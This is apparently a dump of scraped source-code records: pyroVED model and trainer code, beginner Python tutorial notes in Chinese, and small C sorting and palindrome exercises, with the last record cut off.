of rotational, translational, and scale invariances.\n\n Args:\n data_dim:\n Dimensionality of the input data; use (h x w) for images\n or (length,) for spectra.\n latent_dim:\n Number of latent dimensions.\n reg_dim:\n Number of output dimensions in regression. For example,\n for a single output regressor, specify reg_dim=1.\n invariances:\n List with invariances to enforce. For 2D systems, `r` enforces\n rotational invariance, `t` enforces invariance to\n translations, `sc` enforces a scale invariance, and\n invariances=None corresponds to vanilla VAE.\n For 1D systems, 't' enforces translational invariance and\n invariances=None is vanilla VAE\n hidden_dim_e:\n Number of hidden units per each layer in encoder (inference network).\n hidden_dim_d:\n Number of hidden units per each layer in decoder (generator network).\n hidden_dim_cls:\n Number of hidden units (\"neurons\") in each layer of classifier\n num_layers_e:\n Number of layers in encoder (inference network).\n num_layers_d:\n Number of layers in decoder (generator network).\n num_layers_cls:\n Number of layers in classifier\n activation:\n Non-linear activation for inner layers of both encoder and the decoder.\n The available activations are ReLU ('relu'), leaky ReLU ('lrelu'),\n hyberbolic tangent ('tanh'), softplus ('softplus'), and GELU ('gelu').\n (The default is \"tanh\").\n sampler_d:\n Decoder sampler, as defined as p(x|z) = sampler(decoder(z)).\n The available samplers are 'bernoulli', 'continuous_bernoulli',\n and 'gaussian' (Default: 'bernoulli').\n sigmoid_d:\n Sigmoid activation for the decoder output (Default: True)\n seed:\n Seed used in torch.manual_seed(seed) and\n torch.cuda.manual_seed_all(seed)\n\n Keyword Args:\n device:\n Sets device to which model and data will be moved.\n Defaults to 'cuda:0' if a GPU is available and to CPU otherwise.\n dx_prior:\n Translational prior in x direction (float between 0 and 1)\n dy_prior:\n Translational prior in y direction (float between 0 and 1)\n sc_prior:\n Scale prior (usually, sc_prior << 1)\n decoder_sig:\n Sets sigma for a \"gaussian\" decoder sampler\n regressor_sig:\n Sets sigma for a regression sampler\n\n Examples:\n\n Initialize a VAE model with rotational invariance for\n a semi-supervised single-output regression.\n\n >>> data_dim = (28, 28)\n >>> ssvae = ss_reg_iVAE(data_dim, latent_dim=2, reg_dim=1, invariances=['r'])\n \"\"\"\n def __init__(self,\n data_dim: Tuple[int],\n latent_dim: int,\n reg_dim: int,\n invariances: List[str] = None,\n hidden_dim_e: int = 128,\n hidden_dim_d: int = 128,\n hidden_dim_cls: int = 128,\n num_layers_e: int = 2,\n num_layers_d: int = 2,\n num_layers_cls: int = 2,\n activation: str = \"tanh\",\n sampler_d: str = \"bernoulli\",\n sigmoid_d: bool = True,\n seed: int = 1,\n **kwargs: Union[str, float]\n ) -> None:\n \"\"\"\n Initializes ss_reg_iVAE parameters\n \"\"\"\n args = (data_dim, invariances)\n super(ss_reg_iVAE, self).__init__(*args, **kwargs)\n pyro.clear_param_store()\n set_deterministic_mode(seed)\n\n self.data_dim = data_dim\n\n # Initialize z-Encoder neural network\n self.encoder_z = fcEncoderNet(\n data_dim, latent_dim+self.coord, reg_dim,\n hidden_dim_e, num_layers_e, activation, flat=False)\n\n # Initialize y-Encoder neural network\n self.encoder_y = fcRegressorNet(\n data_dim, reg_dim, hidden_dim_cls, num_layers_cls,\n activation)\n\n # Initializes Decoder neural network\n dnet = sDecoderNet if 0 < self.coord < 5 else fcDecoderNet\n self.decoder = dnet(\n data_dim, latent_dim, reg_dim, hidden_dim_d,\n num_layers_d, activation, sigmoid_out=sigmoid_d,\n unflat=False)\n self.sampler_d = get_sampler(sampler_d, **kwargs)\n\n # Set sigma for regression sampler\n self.reg_sig = kwargs.get(\"regressor_sig\", 0.5)\n\n # Sets continuous and discrete dimensions\n self.z_dim = latent_dim + self.coord\n self.reg_dim = reg_dim\n\n # Send model parameters to their appropriate devices.\n self.to(self.device)\n\n def model(self,\n xs: torch.Tensor,\n ys: Optional[torch.Tensor] = None,\n **kwargs: float) -> None:\n \"\"\"\n Model of the generative process p(x|z,y)p(y)p(z)\n \"\"\"\n pyro.module(\"ss_vae\", self)\n batch_dim = xs.size(0)\n specs = dict(dtype=xs.dtype, device=xs.device)\n beta = kwargs.get(\"scale_factor\", 1.)\n # pyro.plate enforces independence between variables in batches xs, ys\n with pyro.plate(\"data\"):\n # sample the latent vector from the constant prior distribution\n prior_loc = torch.zeros(batch_dim, self.z_dim, **specs)\n prior_scale = torch.ones(batch_dim, self.z_dim, **specs)\n with pyro.poutine.scale(scale=beta):\n zs = pyro.sample(\n \"z\", dist.Normal(prior_loc, prior_scale).to_event(1))\n # split latent variable into parts for rotation and/or translation\n # and image content\n if self.coord > 0:\n phi, dx, sc, zs = self.split_latent(zs)\n if 't' in self.invariances:\n dx = (dx * self.t_prior).unsqueeze(1)\n # transform coordinate grid\n grid = self.grid.expand(zs.shape[0], *self.grid.shape)\n x_coord_prime = transform_coordinates(grid, phi, dx, sc)\n # sample label from the constant prior or observe the value\n c_prior = (torch.zeros(batch_dim, self.reg_dim, **specs))\n ys = pyro.sample(\n \"y\", dist.Normal(c_prior, self.reg_sig).to_event(1), obs=ys)\n # Score against the parametrized distribution\n # p(x|y,z) = bernoulli(decoder(y,z))\n d_args = (x_coord_prime, [zs, ys]) if self.coord else ([zs, ys],)\n loc = self.decoder(*d_args)\n loc = loc.view(*ys.shape[:-1], -1)\n pyro.sample(\"x\", self.sampler_d(loc).to_event(1), obs=xs)\n\n def guide(self, xs: torch.Tensor,\n ys: Optional[torch.Tensor] = None,\n **kwargs: float) -> None:\n \"\"\"\n Guide q(z|y,x)q(y|x)\n \"\"\"\n beta = kwargs.get(\"scale_factor\", 1.)\n with pyro.plate(\"data\"):\n # sample and score the digit with the variational distribution\n # q(y|x) = categorical(alpha(x))\n if ys is None:\n c = self.encoder_y(xs)\n ys = pyro.sample(\"y\", dist.Normal(c, self.reg_sig).to_event(1))\n # sample (and score) the latent vector with the variational\n # distribution q(z|x,y) = normal(loc(x,y),scale(x,y))\n loc, scale = self.encoder_z([xs, ys])\n with pyro.poutine.scale(scale=beta):\n pyro.sample(\"z\", dist.Normal(loc, scale).to_event(1))\n\n def split_latent(self, zs: torch.Tensor) -> Tuple[torch.Tensor]:\n \"\"\"\n Split latent variable into parts with rotation and/or translation\n and image content\n \"\"\"\n zdims = list(zs.shape)\n zdims[-1] = zdims[-1] - self.coord\n zs = zs.view(-1, zs.size(-1))\n # For 1D, there is only translation\n phi, dx, sc, zs = self._split_latent(zs)\n return phi, dx, sc, zs.view(*zdims)\n\n def model_aux(self, xs: torch.Tensor,\n ys: Optional[torch.Tensor] = None,\n **kwargs: float) -> None:\n \"\"\"\n Models an auxiliary (supervised) loss\n \"\"\"\n pyro.module(\"ss_vae\", self)\n with pyro.plate(\"data\"):\n # the extra term to yield an auxiliary loss\n aux_loss_multiplier = kwargs.get(\"aux_loss_multiplier\", 20)\n if ys is not None:\n c = self.encoder_y.forward(xs)\n with pyro.poutine.scale(scale=aux_loss_multiplier):\n pyro.sample(\n \"y_aux\", dist.Normal(c, self.reg_sig).to_event(1), obs=ys)\n\n def guide_aux(self, xs, ys=None, **kwargs):\n \"\"\"\n Dummy guide function to accompany model_aux\n \"\"\"\n pass\n\n def set_regressor(self, reg_net: Type[torch.nn.Module]) -> None:\n \"\"\"\n Sets a user-defined regression network\n \"\"\"\n self.encoder_y = reg_net\n\n def regressor(self,\n x_new: torch.Tensor,\n **kwargs: int) -> torch.Tensor:\n \"\"\"\n Applies trained regressor to new data\n\n Args:\n x_new:\n Input data for the regressor part of trained ss-reg-VAE.\n The new data must have the same dimensions\n (images height x width or spectra length) as the one used\n for training.\n kwargs:\n Batch size as 'batch_size' (for encoding large volumes of data)\n \"\"\"\n def regress(x_i) -> torch.Tensor:\n with torch.no_grad():\n predicted = self.encoder_y(x_i)\n return predicted.cpu()\n\n x_new = init_dataloader(x_new, shuffle=False, **kwargs)\n y_predicted = []\n for (x_i,) in x_new:\n y_predicted.append(regress(x_i.to(self.device)))\n return torch.cat(y_predicted)\n\n def encode(self,\n x_new: torch.Tensor,\n y: Optional[torch.Tensor] = None,\n **kwargs: int) -> torch.Tensor:\n \"\"\"\n Encodes data using a trained inference (encoder) network\n\n Args:\n x_new:\n Data to encode. The new data must have\n the same dimensions (images height and width or spectra length)\n as the one used for training.\n y:\n Vector with a continuous variable(s) for each sample in x_new.\n If not provided, the ss-reg-iVAE's regressor will be used to obtain it.\n kwargs:\n Batch size as 'batch_size' (for encoding large volumes of data)\n \"\"\"\n if y is None:\n y = self.regressor(x_new, **kwargs)\n z = self._encode(x_new, y, **kwargs)\n z_loc, z_scale = z.split(self.z_dim, 1)\n return z_loc, z_scale, y\n\n def decode(self, z: torch.Tensor, y: torch.Tensor, **kwargs: int) -> torch.Tensor:\n \"\"\"\n Decodes a batch of latent coordinates\n\n Args:\n z: Latent coordinates (without rotational and translational parts)\n y: Vector with continuous variable(s) for each sample in z\n kwargs: Batch size as 'batch_size'\n \"\"\"\n z = torch.cat([z.to(self.device), y.to(self.device)], -1)\n loc = self._decode(z, **kwargs)\n return loc.view(-1, *self.data_dim)\n\n def manifold2d(self, d: int, y: torch.Tensor, plot: bool = True,\n **kwargs: Union[str, int, float]) -> torch.Tensor:\n \"\"\"\n Returns a learned latent manifold in the image space\n\n Args:\n d: Grid size\n y: Conditional vector\n plot: Plots the generated manifold (Default: True)\n kwargs: Keyword arguments include custom min/max values\n for grid boundaries passed as 'z_coord'\n (e.g. z_coord = [-3, 3, -3, 3]), 'angle' and\n 'shift' to condition a generative model on, and plot parameters\n ('padding', 'padding_value', 'cmap', 'origin', 'ylim')\n \"\"\"\n z, (grid_x, grid_y) = generate_latent_grid(d, **kwargs)\n y = y.unsqueeze(1) if 0 < y.ndim < 2 else y\n y = y.expand(z.shape[0], *y.shape[1:])\n loc = self.decode(z, y, **kwargs)\n if plot:\n if self.ndim == 2:\n plot_img_grid(\n loc, d,\n extent=[grid_x.min(), grid_x.max(), grid_y.min(), grid_y.max()],\n **kwargs)\n elif self.ndim == 1:\n plot_spect_grid(loc, d, **kwargs)\n return loc\n" }, { "alpha_fraction": 0.5404071807861328, "alphanum_fraction": 0.5499691367149353, "avg_line_length": 36.051429748535156, "blob_id": "f2a7812d420db5927e900670731b6f523c17fe6e", "content_id": "e4cf12c0ed58ff8a8c2f552c5c0a3ef6151b269a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6488, "license_type": "permissive", "max_line_length": 104, "num_lines": 175, "path": "/pyroved/trainers/svi.py", "repo_name": "matthewcarbone/pyroVED", "src_encoding": "UTF-8", "text": "from typing import Type, Optional, Union\n\nimport torch\nimport pyro\nimport pyro.infer as infer\nimport pyro.optim as optim\n\nfrom ..utils import set_deterministic_mode\n\n\nclass SVItrainer:\n \"\"\"\n Stochastic variational inference (SVI) trainer for\n unsupervised and class-conditioned VED models consisting\n of one encoder and one decoder.\n\n Args:\n model:\n Initialized model. Must be a subclass of torch.nn.Module\n and have self.model and self.guide methods\n optimizer:\n Pyro optimizer (Defaults to Adam with learning rate 1e-3)\n loss:\n ELBO objective (Defaults to pyro.infer.Trace_ELBO)\n enumerate_parallel:\n Exact discrete enumeration for discrete latent variables\n seed:\n Enforces reproducibility\n \n Keyword Args:\n lr: learning rate (Default: 1e-3)\n device:\n Sets device to which model and data will be moved.\n Defaults to 'cuda:0' if a GPU is available and to CPU otherwise.\n\n Examples:\n\n Train a model with SVI trainer using default settings\n\n >>> # Initialize model\n >>> data_dim = (28, 28)\n >>> trvae = pyroved.models.iVAE(data_dim, latent_dim=2, invariances=['r', 't'])\n >>> # Initialize SVI trainer\n >>> trainer = SVItrainer(trvae)\n >>> # Train for 200 epochs:\n >>> for _ in range(200):\n >>> trainer.step(train_loader)\n >>> trainer.print_statistics()\n\n Train a model with SVI trainer with a \"time\"-dependent KL scaling factor\n\n >>> # Initialize model\n >>> data_dim = (28, 28)\n >>> rvae = pyroved.models.iVAE(data_dim, latent_dim=2, invariances=['r'])\n >>> # Initialize SVI trainer\n >>> trainer = SVItrainer(rvae)\n >>> kl_scale = torch.linspace(1, 4, 50) # ramp-up KL scale factor from 1 to 4 during first 50 epochs\n >>> # Train\n >>> for e in range(100):\n >>> sc = kl_scale[e] if e < len(kl_scale) else kl_scale[-1]\n >>> trainer.step(train_loader, scale_factor=sc)\n >>> trainer.print_statistics()\n \"\"\"\n def __init__(self,\n model: Type[torch.nn.Module],\n optimizer: Type[optim.PyroOptim] = None,\n loss: Type[infer.ELBO] = None,\n enumerate_parallel: bool = False,\n seed: int = 1,\n **kwargs: Union[str, float]\n ) -> None:\n \"\"\"\n Initializes the trainer's parameters\n \"\"\"\n pyro.clear_param_store()\n set_deterministic_mode(seed)\n self.device = kwargs.get(\n \"device\", 'cuda' if torch.cuda.is_available() else 'cpu')\n if optimizer is None:\n lr = kwargs.get(\"lr\", 1e-3)\n optimizer = optim.Adam({\"lr\": lr})\n if loss is None:\n if enumerate_parallel:\n loss = infer.TraceEnum_ELBO(\n max_plate_nesting=1, strict_enumeration_warning=False)\n else:\n loss = infer.Trace_ELBO()\n guide = model.guide\n if enumerate_parallel:\n guide = infer.config_enumerate(guide, \"parallel\", expand=True) \n self.svi = infer.SVI(model.model, guide, optimizer, loss=loss)\n self.loss_history = {\"training_loss\": [], \"test_loss\": []}\n self.current_epoch = 0\n\n def train(self,\n train_loader: Type[torch.utils.data.DataLoader],\n **kwargs: float) -> float:\n \"\"\"\n Trains a single epoch\n \"\"\"\n # initialize loss accumulator\n epoch_loss = 0.\n # do a training epoch over each mini-batch returned by the data loader\n for data in train_loader:\n if len(data) == 1: # VAE mode\n x = data[0]\n loss = self.svi.step(x.to(self.device), **kwargs)\n else: # VED or cVAE mode\n x, y = data\n loss = self.svi.step(\n x.to(self.device), y.to(self.device), **kwargs)\n # do ELBO gradient and accumulate loss\n epoch_loss += loss\n\n return epoch_loss / len(train_loader.dataset)\n\n def evaluate(self,\n test_loader: Type[torch.utils.data.DataLoader],\n **kwargs: float) -> float:\n \"\"\"\n Evaluates current models state on a single epoch\n \"\"\"\n # initialize loss accumulator\n test_loss = 0.\n # compute the loss over the entire test set\n with torch.no_grad():\n for data in test_loader:\n if len(data) == 1: # VAE mode\n x = data[0]\n loss = self.svi.step(x.to(self.device), **kwargs)\n else: # VED or cVAE mode\n x, y = data\n loss = self.svi.step(\n x.to(self.device), y.to(self.device), **kwargs)\n test_loss += loss\n\n return test_loss / len(test_loader.dataset)\n\n def step(self,\n train_loader: Type[torch.utils.data.DataLoader],\n test_loader: Optional[Type[torch.utils.data.DataLoader]] = None,\n **kwargs: float) -> None:\n \"\"\"\n Single training and (optionally) evaluation step\n\n Args:\n train_loader:\n Pytorch’s dataloader object with training data\n test_loader:\n (Optional) Pytorch’s dataloader object with test data\n \n Keyword Args:\n scale_factor:\n Scale factor for KL divergence. See e.g. https://arxiv.org/abs/1804.03599\n Default value is 1 (i.e. no scaling)\n \"\"\"\n train_loss = self.train(train_loader, **kwargs)\n self.loss_history[\"training_loss\"].append(train_loss)\n if test_loader is not None:\n test_loss = self.evaluate(test_loader, **kwargs)\n self.loss_history[\"test_loss\"].append(test_loss)\n self.current_epoch += 1\n\n def print_statistics(self) -> None:\n \"\"\"\n Prints training and test (if any) losses for current epoch\n \"\"\"\n e = self.current_epoch\n if len(self.loss_history[\"test_loss\"]) > 0:\n template = 'Epoch: {} Training loss: {:.4f}, Test loss: {:.4f}'\n print(template.format(e, self.loss_history[\"training_loss\"][-1],\n self.loss_history[\"test_loss\"][-1]))\n else:\n template = 'Epoch: {} Training loss: {:.4f}'\n print(template.format(e, self.loss_history[\"training_loss\"][-1]))\n" } ]
19
qkrckdgus1015/first_project
https://github.com/qkrckdgus1015/first_project
c9dfb08d6cda90eb2a5dac67661af54886881626
97f40262443a88d32401fe85c06a839984804d50
aa28346b6a666a2de26737c580705c51746061d5
refs/heads/main
2023-03-24T07:40:34.417594
2021-03-26T06:44:19
2021-03-26T06:44:19
351,663,260
0
0
MIT
2021-03-26T04:38:04
2021-03-26T04:38:06
2021-03-26T06:44:19
null
[ { "alpha_fraction": 0.6190476417541504, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 20, "blob_id": "acce43d6989d3bf2cabb25cc38ef4abd8cdee1ba", "content_id": "684d09ac4b21ccfe37a4329f895f16c9ae287835", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 21, "license_type": "permissive", "max_line_length": 20, "num_lines": 1, "path": "/main.py", "repo_name": "qkrckdgus1015/first_project", "src_encoding": "UTF-8", "text": "print('hello git 3')\n" } ]
1
LoggerWang/python_study
https://github.com/LoggerWang/python_study
3e17ea81414810ed4f9a7aa1c8a87e686eb5a346
11da30c79298ddefea234489f899c05df1b2cd41
16fda2495983775131a9655abca1ebede28a9cac
refs/heads/master
2021-05-05T05:39:45.777387
2018-01-24T01:54:45
2018-01-24T01:54:45
118,694,825
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6581818461418152, "alphanum_fraction": 0.7018181681632996, "avg_line_length": 16.25, "blob_id": "95d3914f40b6a99d652f1e1df906efe030a19514", "content_id": "e050c4de146b89289752f45ba8d606995b553e86", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 279, "license_type": "no_license", "max_line_length": 59, "num_lines": 16, "path": "/python_legend/__init__.py", "repo_name": "LoggerWang/python_study", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# encoding: utf-8\n\n\n\n\n\"\"\"\n@version: python3\n@author: ‘WangLezhi‘\n@license: Apache Licence \n@contact: [email protected]\n@site: http://blog.csdn.net/zhongguobaozi?viewmode=contents\n@software: PyCharm Community Edition\n@file: __init__.py.py\n@time: 2018/1/24 9:31\n\"\"\"" }, { "alpha_fraction": 0.7588744759559631, "alphanum_fraction": 0.7800865769386292, "avg_line_length": 23.827957153320312, "blob_id": "748bad3f4fe7a48323a6f1513a448713f930245b", "content_id": "aa6d2e183f4e17baf95258a0fa3291c914245d73", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 4466, "license_type": "no_license", "max_line_length": 243, "num_lines": 93, "path": "/python_legend/doc/初识python.md", "repo_name": "LoggerWang/python_study", "src_encoding": "UTF-8", "text": "#初识Python\n- 3月都快结束了,又到了万物交配的季节!是时候执行今年的计划之一了,再学一门语言,那就python吧!好记性不如烂笔头,还是把学习的东西记录一下,以便加深印象和后面翻阅\n\n## 一、什么是Python[(官网)](https://www.python.org/)\n- Python是人称龟叔的Guido va Rossum在1989编写的一门高级编程语言。python有很完善的内置基础代码库,包括网络、文件GUI、数据库、文本等,所以在python开始有许多功能不必去重复造轮子。另外还有大量的第三方库可以拿来使用。\n- 据说现在很多网内外的主流网站都是用python开发的,具体哪些网站我也没法去验证,不过个人感觉python还是挺牛逼的。\n## 二、Python的优缺点\n- 优点:优雅、明确、简单、易读,对初学者入门门槛低,代码量少。\n- 缺点:python是解释型语言,代码在执行的时候需要逐行翻译成CPU需要的机器码,比较耗时,所以运行速度相对C比较慢。另外一个缺点就是解释型的语言都不能加密,发布出去的代码都是源代码,\n- python的应用场景:网站、后台、脚本等\n- 环境搭建:下载[Windows64位Python3.5](https://www.python.org/ftp/python/3.5.2/python-3.5.2-amd64.exe)或[32位Python3.5](https://www.python.org/ftp/python/3.5.2/python-3.5.2.exe)后添加到环境变量,环境配置好之后,运行cmd,输入python,如果显示有Pyhton 3.5.X就是配置成功,否则就是环境变量没有配好,需要重新配置。\n\n## 三、Python解释器\n- python写的代码是已.py结尾的文件,有多重python解释器。\n- CPython:应用最广泛,官网下载安装的python3.5就能获取到一个官方版本的python解释器,也就是CPython,顾名思义CPython就是用用C语言开发的python解释器,它以>>>作为提示符\n- 当然还有其他解释器,如IPython是在CPython之上的一个交互式解释器,相比增强了交互方式,但是执行代码的功能和CPython是一样的,还有Pypy、Jython、IronPython等解释器类型。如果要和Java或.Net平台交互,最好的办法不是用Jython或IronPython,而是通过网络调用来交互,确保各程序之间的独立性。\n-\n## 四、HelloWorld\n- 每学一门开发语言都是从HelloWorld入手的,Python的hellowrold是这样的:在dos窗口下的命令行输入python,进入到python交互式窗口,这时有>>>的提示符,输入:\n\n```\nprintf('hello,world')\n```\n然后就有hello,world输出了,就是这么简单。如果在>>>后面输入1+2,回车,会输出结果3\n\n- 除了直接在python交互环境下输入python代码之外,还可以运行一个.py的文件去执行文件里的python代码,比如,在命令行模式下执行:\n\n```\nC:\\work>python calc.py\n```\n解释器就会代码执行python calc.py里的代码\n- 退出python交互环境:exit()\n\n\n## 五、Pyhton编辑器\n\n推荐两种编辑器,但绝对不能用word和记事本,因为word保存的不是纯文本文件,记事本不知道是啥原因,可能是编码的问题吧\n- [Sublime Text](http://www.sublimetext.com/)\n- [Notepd++](http://notepad-plus-plus.org/)\n\n比如在D: /python文件下创建helloworld.py文件\n里面输入:\n\n```\nprint('helloworld from notepad')\n```\n然后到命令行进入到相应文件夹下下输入\npython helloworld.py,则会输出 helloworld from notepad.\n* 文件名只能是英文字母、数字和下划线的组合\n* 如果在windows中想直接点击运行python文件,需要在.py文件的第一行加上特殊注释:\n\n```\n#!/usr/bin/env python3\nprint('helloworld from nodepad')\n```\n\n## 六、输入和输出\n\n- 输出:print()函数\n执行 print('helloworld'),则输出:\n\n```\nhelloworld\n```\n执行:\nprint(1+2)则输出:\n\n```\n3\n```\n执行:\nprint('1+2=',1+2)则输出:\n\n```\n1+2=3\n```\nprint里面的‘1+2=‘会被当做字符串输出,后面的1+2会被直接执行计算结果\n\n- 输入:input()函数\n执行:\n\n```\n>>> name = input()\n```\n交互环境则进入用户输入等待状态,用户输入Legend,点击回车后,则吧Legend的值赋值给了name,再输入name回车,则会输出name的值:Legend\n\n```\n>>> name\n'Legend'\n```\n## 总结:\n\n感觉还挺有意思的,和Java、C是不同,但是具体还得往后面看看。总算开了个头,后面好好坚持吧!前戏结束了,该切入正题了,好激动。\n\n" }, { "alpha_fraction": 0.6471773982048035, "alphanum_fraction": 0.6950604915618896, "avg_line_length": 14.86400032043457, "blob_id": "93152939d38d0d705cb28841036546a5333d0bb2", "content_id": "c8611c1d07aeaa400f71de651b4cafc49e2fd812", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3980, "license_type": "no_license", "max_line_length": 160, "num_lines": 125, "path": "/python_legend/doc/基础语法一.md", "repo_name": "LoggerWang/python_study", "src_encoding": "UTF-8", "text": "## python 基础语法\n\n### 一、标识符\n- 标识符可以包括英语、数字以及下划线,但是不能以数字开头\n- python中的标识符是区分大小写的\n- 以下划线开头的标识符有特殊意义。\n 1、以单下划线开发(_foo)的标识符表示不能直接访问的类属性,需要通过类提供的接口进行访问;\n 2、以双下划线开头的(__foo)代表类的私有成员\n 3、一双下划线开头和结尾的(__foo__)代表python里的特殊方法专用标识符,如__init__()代表类的构造函数\n\n-保留字符:\nand exec not assert finally or break for pass class from print continue global raise drf if return del import try elif in while else is with except lambda yield\n\n### 二、行和缩进\n- Python和其他语言最大的区别就是python代码块不适用大括号{}来控制类、函数以及其他逻辑判断。那用什么呢?---缩进!比如:\n\n```\n# 这是注释,用#表示\na = 100\nif a >= 0:\n print(a)\nelse:\n print(-a)\n```\n其中,#表示注释的语句,编译的时候回忽略,其他每一行都是一个语句,当语句以:冒号结尾是,缩进的语句视为代码块。\n\n- 缩进并没有规定缩进几个空格还是Tab,一般使用4个空格的缩进\n- 所有代码块语句必须严格包含相同的缩进空格数量,不能混用\n\n- 缩进的好处就是迫使你把一段很长的代码拆分若干函数,从而得到缩进较少的代码\n\n- 缩进的坏处:不能复制粘贴\n\n\n### 三、注释\n- \"#\" 表示单行注释\n\n```\n'''\n 三个单引号或三个多引号表示多行注释\n'''\n\"\"\"\n 三个单引号或三个多引号表示多行注释\n\"\"\"\n```\n\n### 四、同一行显示多条语句\n- python中同一行可以写多条语句,用 ; 分割,如:\n\n```\n#!/usr/bin/python\n\nimport sys; x = 'runoob'; sys.stdout.write(x + '\\n')\n```\n\n\n### 五、数据类型\npython有五种标准的数据类型\n\n\n- Numbers(数字)\n- String(字符串)\n- List(列表)\n- Tuple(元祖)\n- Dictionary(字典)\n\n- 整数:和数学的写法一样:0,1,100,-1\n- 浮点数:按照科学计数法表示,小数点的位置是可变的,如1.23X10^8^和12.3X10^7^的值是一样的。但是对于很大或很小的浮点数,就必须用科学计数法表示,把10用e替代,1.23x109就是1.23e9,或者12.3e8,0.000012可以写成1.2e-5,等等\n\n整数和浮点数在计算机内部存储的方式是不同的,整数运算永远是精确的(除法难道也是精确的?是的!),而浮点数运算则可能会有四舍五入的误差。\n\n- 字符串,是以单引号'或双引号\"括起来的文本,比如'abc'.里面只有a,b,c这3个字符,如果想把'表示Wei一个字符就需要用双引号包起来,比如:\"I'm OK\",这里面有 I,',m,空格,O,K这6个字符\n- 转义字符:\\\n'I\\'m \\\"OK\\\"!' 表示 字符串I'm\"OK\"\n\\n:换行\n\\t:制表符\n\\\\:\\\n\n- 布尔值 True或False两个值\n布尔值可以用and、or和not运算\n\n-空值 :None.None不能理解为0,因为0是有意义的,None是一个特殊的空值。\n\n- 变量:可以是数字,英文,下划线的组合,但是不能以数字开头。Pyhton的变量可以理解为动态语言,就是给变量赋值的时候不需要定义类型,如\n\n```\na = 123 #a是整数\na = \"AB\" #a是字符串\na = True #a是布尔值\n```\na = \"AB\"中\n给变量赋值的时候,内存中的表示是这样的:1.在内存中创建了一个'AB'的字符串;\n2在内存中创建了一个名为a的变量,并把它指向'AB'\n\n-除法,python有两种除法:\n1:/\n\n```\n>>> 10 / 3\n3.3333333333333335\n```\n\n/除法计算结果是浮点数,即使是两个整数恰好整除,结果也是浮点数:\n\n\n```\n>>> 9 / 3\n3.0\n```\n\n2:还有一种除法是//,称为地板除,两个整数的除法仍然是整数:\n\n\n```\n>>> 10 // 3\n3\n```\n\n你没有看错,整数的地板除//永远是整数,即使除不尽。要做精确的除法,使用/就可以\n-取余:\n\n```\n>>> 10 % 3\n1\n```\n\n" } ]
3
DirceuSilvestre/Algoritmos-Khan-Academy
https://github.com/DirceuSilvestre/Algoritmos-Khan-Academy
99601208daf616c208e4b1f604dac4fa6762bd71
9270e5b9eda05ab211702864185b0b697270c0f2
181d668ec0df62313b25150edb17a7b0315cb4bb
refs/heads/main
2023-08-03T17:06:39.279557
2021-10-02T06:09:44
2021-10-02T06:09:44
393,147,901
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.46898263692855835, "alphanum_fraction": 0.518610417842865, "avg_line_length": 20.210525512695312, "blob_id": "9a5878fe04832f80a9e648eb9254540ea7d71b0b", "content_id": "8ae0102bb944ed21e5c2b162ae7acb0167560b40", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 403, "license_type": "no_license", "max_line_length": 77, "num_lines": 19, "path": "/Quick Sort.c", "repo_name": "DirceuSilvestre/Algoritmos-Khan-Academy", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n#include <stdlib.h>\n\nint cmpfunc (const void * a, const void * b) {\n return ( *(int*)a - *(int*)b );\n}\n\nint main()\n{\n int vetor[] = {1, 50, 6, 35, 3, 67, 25, 2, 46, 79, 11};\n int i = 0;\n \n qsort(vetor, sizeof(vetor)/sizeof(int), sizeof(int), cmpfunc);\n \n while(i < ( sizeof(vetor)/sizeof(int) ) ){ printf(\"%d \", vetor[i]); i++;}\n printf(\"\\n\");\n\n return 0;\n}\n" }, { "alpha_fraction": 0.36994218826293945, "alphanum_fraction": 0.38728323578834534, "avg_line_length": 24.163637161254883, "blob_id": "910ac6b5e112d858adbfbdc6e5bfa93a5b957f11", "content_id": "eaf6e243a0a4a9329bfb41b47c7258438a6a474b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1385, "license_type": "no_license", "max_line_length": 106, "num_lines": 55, "path": "/Selection Sort.c", "repo_name": "DirceuSilvestre/Algoritmos-Khan-Academy", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n\nvoid swap(int *vetor, int direcao)\n{\n int i, j, maior, posicao, troca;\n if (direcao == 0) //do maior para o menor\n {\n for (i = 0; i < ((sizeof(vetor)/2)); i++)\n {\n maior = 0;\n for (j = i; j < (sizeof(vetor)/2)+ 1; j++)\n {\n if (vetor[j] > maior)\n {\n maior = vetor[j];\n posicao = j;\n }\n }\n troca = vetor[i];\n vetor[i] = vetor[posicao];\n vetor[posicao] = troca;\n }\n }\n else if(direcao == 1) //do menor para o maior\n {\n for (i = 0; i < ((sizeof(vetor)/2)); i++)\n {\n maior = 999;\n for (j = i; j < (sizeof(vetor)/2)+ 1; j++)\n {\n if (vetor[j] < maior)\n {\n maior = vetor[j];\n posicao = j;\n }\n }\n troca = vetor[i];\n vetor[i] = vetor[posicao];\n vetor[posicao] = troca;\n }\n }\n}\n\nint main(void)\n{\n int vetor[] = {1, 3 , 2, 5, 4};\n int entrada;\n scanf(\"%d\", &entrada); //usuario escolhe a ordem, 0 decrescente e 1 crescente, outros números nada faz\n swap(vetor, entrada);\n for (int i = 0; i < (sizeof(vetor)/4); i++)\n {\n printf(\"%d\\n\", vetor[i]);\n }\n return 0;\n}\n" }, { "alpha_fraction": 0.6285714507102966, "alphanum_fraction": 0.6392857432365417, "avg_line_length": 18.34482765197754, "blob_id": "742aef4dbd4ce6751884dc576a4bf8a782bc0e09", "content_id": "b492e592d748b2cc6ca2b1b378a49bfa5fdeee8f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 563, "license_type": "no_license", "max_line_length": 52, "num_lines": 29, "path": "/Palíndromo Recursivo.c", "repo_name": "DirceuSilvestre/Algoritmos-Khan-Academy", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n#include <stdbool.h>\n#include <string.h>\n\nbool palindromo(char *palavra, int inicio, int fim)\n{\n\tfim -= 1;\n\tif (inicio == fim){ return 